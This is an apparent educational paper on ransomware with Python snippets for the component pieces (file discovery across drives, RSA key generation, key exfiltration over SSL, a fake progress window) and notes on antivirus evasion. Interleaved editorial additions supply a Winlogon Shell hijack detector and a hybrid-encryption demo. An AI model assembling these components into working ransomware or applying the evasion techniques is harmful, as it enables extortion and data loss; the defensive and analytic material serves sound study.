Youness Zougar (@L3tsXpl0it)
zougar92@gmail.com
October 30, 2014
In this paper, I explain how ransomware works by giving some examples. This
is done for educational purposes only, to better understand how ransomware
behaves.
1 What is a Ransomware ?
Briefly, ransomware is a type of malware created with the aim of restricting
access to a victim's computer by encrypting files on the hard drive. After
that, the victim is asked to pay the attacker to get the restriction removed by
decrypting the encrypted files. CryptoLocker, for example, is a ransomware
that infected more than 200K systems in the world and generated millions
of dollars for its developers.
2 How does it work ?
The process is simple. Generally, when the ransomware gets executed, it
scans all the directories on the system in the background, looking for interesting
file extensions (.docx, .xlsx...) that were hard coded in it, then it encrypts
them using an encryption key. Some ransomware completely blocks the
victim from accessing the system by changing the Winlogon Shell value
(HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell) from
explorer.exe to the path of the malware executable, so that the locker window
comes up instead of the desktop at every logon. At the end, the ransomware
pops up a window asking the victim for a ransom to get the decryption
key. To push the victim to pay as fast as possible, some ransomware captures
the webcam and displays the feed to scare the victim.
Now we have an idea of how a simple ransomware works. Let's go deeper
into its functions.
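The Winlogon Shell trick is easy to check for. The following is an added example, not code from the paper, written in Python 3 (the paper's own snippets are Python 2): it splits a Shell value the way Winlogon does (a comma-separated list of programs), flags every entry whose program is not explorer.exe, and on Windows reads the live HKLM and HKCU values. The values in SAMPLE_VALUES are constructed, and the function names are my own.

```python
# Added example (not from the paper): spotting a hijacked Winlogon Shell value.
# Python 3.  The registry read only works on Windows; the parsing and the
# classification run anywhere, here against constructed sample values.
import ntpath
import sys

# HKLM holds the machine-wide value; the same path under HKCU, if present,
# overrides it for that user and is a common persistence spot for lockers.
WINLOGON_SUBKEY = r"Software\Microsoft\Windows NT\CurrentVersion\Winlogon"
EXPECTED_SHELL = "explorer.exe"


def parse_shell_value(value):
    """Winlogon accepts a comma-separated list of programs; return them cleaned."""
    return [e.strip().strip('"') for e in value.split(",") if e.strip()]


def suspicious_shell_entries(value):
    """Return every entry of the Shell value that is not explorer.exe.

    A locker either replaces explorer.exe outright or appends itself after it;
    both leave at least one entry whose program name is not explorer.exe.
    """
    bad = []
    for entry in parse_shell_value(value):
        program = entry.split()[0] if entry.split() else entry  # drop arguments
        # ntpath handles backslash paths on any host, so 'C:\Windows\explorer.exe'
        # and plain 'explorer.exe' both count as the stock shell.
        if ntpath.basename(program).lower() != EXPECTED_SHELL:
            bad.append(entry)
    return bad


def read_live_shell_values():
    """Read the HKLM and HKCU Shell values on Windows; {} on other platforms."""
    if sys.platform != "win32":
        return {}
    import winreg
    found = {}
    for name, hive in (("HKLM", winreg.HKEY_LOCAL_MACHINE),
                       ("HKCU", winreg.HKEY_CURRENT_USER)):
        try:
            with winreg.OpenKey(hive, WINLOGON_SUBKEY) as key:
                found[name], _ = winreg.QueryValueEx(key, "Shell")
        except OSError:
            pass  # no such key or value; normal for HKCU on a clean machine
    return found


# Constructed sample values, not read from a real machine.
SAMPLE_VALUES = {
    "clean": "explorer.exe",
    "clean-full-path": r"C:\Windows\explorer.exe",
    "replaced": r"C:\Users\Public\locker.exe",
    "appended": r'explorer.exe,"C:\ProgramData\lock.exe"',
}


def scan(values):
    """Map each value name to its suspicious entries (an empty list means clean)."""
    return {name: suspicious_shell_entries(v) for name, v in values.items()}


if __name__ == "__main__":
    for name, entries in scan(read_live_shell_values() or SAMPLE_VALUES).items():
        print("%-16s %s" % (name, "HIJACKED: %s" % entries if entries else "ok"))
```

Run on a Windows host it reports the live values; elsewhere it falls back to the constructed samples. The same check belongs in an incident triage script next to the Run keys, since a locker that rewrites Shell survives a reboot.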
3 How Ransomware is made ?
3.1 Scenario
Let's think of a simple ransomware scenario.
The victim gets the executable on his machine (torrent download, an
infected USB stick...) and launches it. A window pops up displaying a
loading bar asking the victim to wait.
In the meantime, in the background, all the interesting files get encrypted
with a generated unique RSA-2048 public key. Note that RSA can only encrypt
a message shorter than its modulus (256 bytes for RSA-2048), so in practice
each file is encrypted with a symmetric cipher and only the per-file symmetric
key is encrypted with the RSA public key; the rest of this scenario keeps the
single RSA step for simplicity.
Once the files are encrypted, the generated RSA-2048 pair (public and private
keys) is sent to the attacker's server (if the victim is connected to the
Internet) or stored on the machine (if she isn't connected). Storing the private
key on the victim's machine is a weakness of this design: anyone who finds it
can decrypt the files without paying, which is why real families such as
CryptoLocker generate the key pair on the attacker's server and only ever send
the public key to the victim.
When the encryption of the files is finished, the loading window is closed and
a new window is launched, displaying a ransom message and the remaining
time to pay to get the decryption key.
To get the RSA-2048 private key, the victim has to pay before time runs
out using the attacker's defined methods (Bitcoin, Paysafecard, Ukash...).
Once the victim gets the private key and enters it, the decryption process
is executed to get back the original files.
3.2 Functions
The scenario can be translated into the functions shown below.
- Launch Loading Window : A fake loading bar is created to push the
user to wait until the encryption of the files is finished.
Example:
import ttk
from Tkinter import *

def fake_loading_window():
    t = Tk()
    label = Message(t, text="Please wait...")
    label.pack()
    prog_bar = ttk.Progressbar(orient=HORIZONTAL, length=500, mode='determinate')
    prog_bar.pack()  # the paper's version never packed the bar, so it stayed invisible
    t.title("Encrypting files...")
    prog_bar.start()  # animates the bar on its own; nothing is really measured
    t.mainloop()
- Get Files : A function that returns the interesting files found on the
mounted volumes and in the current user's home folder.
Example:
import os
import fnmatch

def get_files():
    matches = []
    volumes = []
    path = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
    file_ext = []  # target patterns, e.g. ['*.docx', '*.xlsx']; left empty in the paper
    # Every mounted drive except C:, plus the user's profile on C:
    # (the paper's version appended the bare letter, which os.walk treats as a
    # relative directory, so the drive root ':\\' is appended here instead)
    for p in path:
        if os.path.exists(p + ':\\'):
            volumes.append(p + ':\\')
    volumes.append(os.getenv('USERPROFILE'))
    for v in volumes:
        if v != 'C:\\':
            for root, dirs, files in os.walk(v):
                for f in file_ext:
                    for i in fnmatch.filter(files, f):
                        matches.append(os.path.join(root, i))
    return matches
- Generate Keys : A function that generates an RSA-2048 public/private
key pair.
Example:
from Crypto.PublicKey import RSA

def generate_keys():
    private = RSA.generate(2048)
    public = private.publickey()
    private_key = private.exportKey()
    public_key = public.exportKey()
    return public_key, private_key
- Encrypt Files : This function uses the public key generated by the
Generate Keys function and encrypts all the files returned by the Get Files
function, then it adds an extension to the encrypted files.
- Decrypt Files : This function decrypts the files using the private key
entered by the victim in the entry of the ransom window.
Example:
from Crypto.PublicKey import RSA

def decrypt(message, privkey):
    decryptor = RSA.importKey(privkey)
    # PyCrypto's key.decrypt() is raw RSA with no padding, so 'message' can be
    # at most one modulus (256 bytes) long; PyCryptodome removed this method
    # in favour of Crypto.Cipher.PKCS1_OAEP
    decrypted = decryptor.decrypt(message)
    return decrypted
- Send Private Key : If the victim is connected to the Internet, this
function sends the generated pair (public/private keys) to the server over
a secured connection (SSL). Otherwise, this function stores the generated pair
in an obfuscated way somewhere on the victim's machine.
In most cases the generated pair is sent to the server, because we
assume that the victim executes the executable directly after downloading
it, so an Internet connection is present. Until this step completes, the
private key sits in the process memory of the victim's machine, and in the
offline case on its disk; a memory dump or a forensic search for it recovers
the files without paying, which is why a sound design generates the pair on
the server and ships only the public key.
Example (client):
import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('localhost', 1337))
sslSocket = socket.ssl(s)  # Python 2's deprecated wrapper; the ssl module replaced it
# server() returns the peer certificate's subject as a string; a substring
# match on the CN is not certificate validation (no chain or expiry check)
if "CN=TOTO" in repr(sslSocket.server()):
    sslSocket.write('Hello secure socket\n')
    print "connected!"
    print "sending keys..."  # only announced: the paper's client never writes the keys
s.close()
Example (server):
import socket
from OpenSSL import SSL

context = SSL.Context(SSL.SSLv23_METHOD)
context.use_privatekey_file('server.key')
context.use_certificate_file('server.crt')
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s = SSL.Connection(context, s)
s.bind(('0.0.0.0', 1337))
s.listen(5)
while True:
    conn, addr = s.accept()
    print repr(conn.recv(1024))
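The Encrypt Files, Decrypt Files and Send Private Key functions leave two points implicit: an RSA key can only encrypt something shorter than its modulus, so file contents cannot go through RSA directly, and only the public key is ever needed on the victim's side. The following added example (not code from the paper; Python 3.8+, standard library only) shows both. A toy, unpadded 512-bit RSA stands in for RSA-2048 and an HMAC-SHA256 counter-mode keystream stands in for AES-CTR; the key, function and sample names are my own and the 342-byte document is constructed. Encrypting that document directly with RSA fails, while wrapping a fresh 32-byte per-file key with the public key and unwrapping it with the private key round-trips for any length.

```python
# Added example (not from the paper): hybrid encryption as real ransomware does it.
# Python 3.8+, standard library only.  The RSA here is a textbook toy without
# padding, used only to show the size limit and the key-wrapping structure;
# a real implementation uses RSA-OAEP and AES from a maintained library.
import hashlib
import hmac
import os
import random


def _is_probable_prime(n, rng, rounds=20):
    """Miller-Rabin test, used only to generate the demo key."""
    if n < 4:
        return n in (2, 3)
    if n % 2 == 0:
        return False
    d, r = n - 1, 0
    while d % 2 == 0:
        d //= 2
        r += 1
    for _ in range(rounds):
        x = pow(rng.randrange(2, n - 1), d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False
    return True


def _random_prime(bits, rng):
    while True:
        p = rng.getrandbits(bits) | (1 << (bits - 1)) | 1  # exact length, odd
        if _is_probable_prime(p, rng):
            return p


def toy_rsa_keypair(bits=512, seed=None):
    """Return ((n, e), (n, d)); a seed gives a reproducible demo key."""
    rng = random.Random(seed) if seed is not None else random.SystemRandom()
    e = 65537
    while True:
        p, q = _random_prime(bits // 2, rng), _random_prime(bits // 2, rng)
        phi = (p - 1) * (q - 1)
        if p != q and phi % e:  # e is prime, so this means gcd(e, phi) == 1
            break
    return (p * q, e), (p * q, pow(e, -1, phi))


def rsa_wrap(pub, data):
    """Textbook RSA: only works if data, read as an integer, is below n."""
    n, e = pub
    m = int.from_bytes(data, "big")
    if m >= n:
        raise ValueError("%d bytes do not fit a %d-bit modulus" % (len(data), n.bit_length()))
    return pow(m, e, n).to_bytes((n.bit_length() + 7) // 8, "big")


def rsa_unwrap(priv, blob, length):
    n, d = priv
    return pow(int.from_bytes(blob, "big"), d, n).to_bytes(length, "big")


def _keystream(key, nonce, length):
    """HMAC-SHA256 in counter mode, standing in for AES-CTR."""
    out = b""
    for counter in range((length + 31) // 32):
        out += hmac.new(key, nonce + counter.to_bytes(8, "big"), hashlib.sha256).digest()
    return out[:length]


def file_encrypt(pub, plaintext):
    """Victim side: needs only the public key. Fresh key per file, wrapped with RSA."""
    file_key, nonce = os.urandom(32), os.urandom(16)
    ks = _keystream(file_key, nonce, len(plaintext))
    return rsa_wrap(pub, file_key) + nonce + bytes(a ^ b for a, b in zip(plaintext, ks))


def file_decrypt(priv, blob):
    """Attacker side: needs the private key, which never had to leave the server."""
    n, _ = priv
    size = (n.bit_length() + 7) // 8
    wrapped, nonce, body = blob[:size], blob[size:size + 16], blob[size + 16:]
    ks = _keystream(rsa_unwrap(priv, wrapped, 32), nonce, len(body))
    return bytes(a ^ b for a, b in zip(body, ks))


# Constructed sample "document": 342 bytes, far above a 512-bit (64-byte) modulus.
SAMPLE_DOCUMENT = b"Quarterly figures, constructed sample text for the demo. " * 6


def demo(seed=1):
    """Return (direct RSA on the document worked?, hybrid round trip worked?)."""
    pub, priv = toy_rsa_keypair(512, seed)
    try:
        rsa_wrap(pub, SAMPLE_DOCUMENT)
        direct_ok = True
    except ValueError:
        direct_ok = False
    return direct_ok, file_decrypt(priv, file_encrypt(pub, SAMPLE_DOCUMENT)) == SAMPLE_DOCUMENT


if __name__ == "__main__":
    print("direct RSA on the sample: %s, hybrid round trip: %s" % demo())
```

For an analyst, the split between file_encrypt (public key only) and file_decrypt (private key) is what matters: a victim that only ever received the public key cannot recover files without the attacker's private key, whereas a private key found in memory or on disk, as in the offline branch of the scenario above, decrypts everything without paying.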
3.3 What about Antivirus ?
The most used and targeted environment for malware today is Windows.
So, we can't target this environment without thinking about antivirus. Malware
developers need to evade it to keep their malware undetected when scanned.
An antivirus classifies an analyzed executable in one of the following statuses :
- Detected :
The executable is detected because of a signature or malicious behavior. It
can also be detected as a false positive.
- Not detected :
The executable isn't detected because no blacklisted signature was found in
it, or its behavior isn't considered harmful. It may also use some techniques to
bypass antivirus detection.
Malware developers are more interested in the second status. So, to make
an executable undetectable, they use techniques to bypass antivirus
detection. This can be done by creating a polymorphic code generator, for
example. The generator helps to bypass signature-based detection, as it
generates a totally different sample of the executable each time while keeping
the same behavior.
RunPE technique : A well-known technique used by malware developers: the
real payload is written into the memory of a freshly started legitimate process
and run from there, so the decrypted payload never touches the disk and its
activity shows up under the name of the host process.
Python programming : The code gets partly obfuscated when using
py2exe to create a Windows executable from a Python source file. This is weak
protection: py2exe only bundles the compiled bytecode, which can be extracted
and decompiled back to readable source.
Some other techniques can be used to achieve anti-detection.
4 How to prevent malware infection ?
Here is some basic advice to keep malware away from your computer.
- Keep your antivirus updated
Yes, today the malware isn't detected because of a bypass technique. But
what about tomorrow ?
- Be aware of what you are executing on your machine
Don't trust files downloaded using torrents, for example, as it is one of
the favorite ways for malware developers to spread malware.
- Keep offline backups of your files
Encryption only hurts if the files exist nowhere else; a backup that is not
permanently mounted on the machine cannot be encrypted along with the originals.
5 Conclusion
Nowadays, people should be aware of the existence of this type of malware
and what it can do. Moreover, they must protect and secure their
computers to stay safe from any compromise of their systems or personal
sensitive information. Antivirus companies, for their part, need new methods
to quickly detect and stop sophisticated malware before it spreads across
the Internet.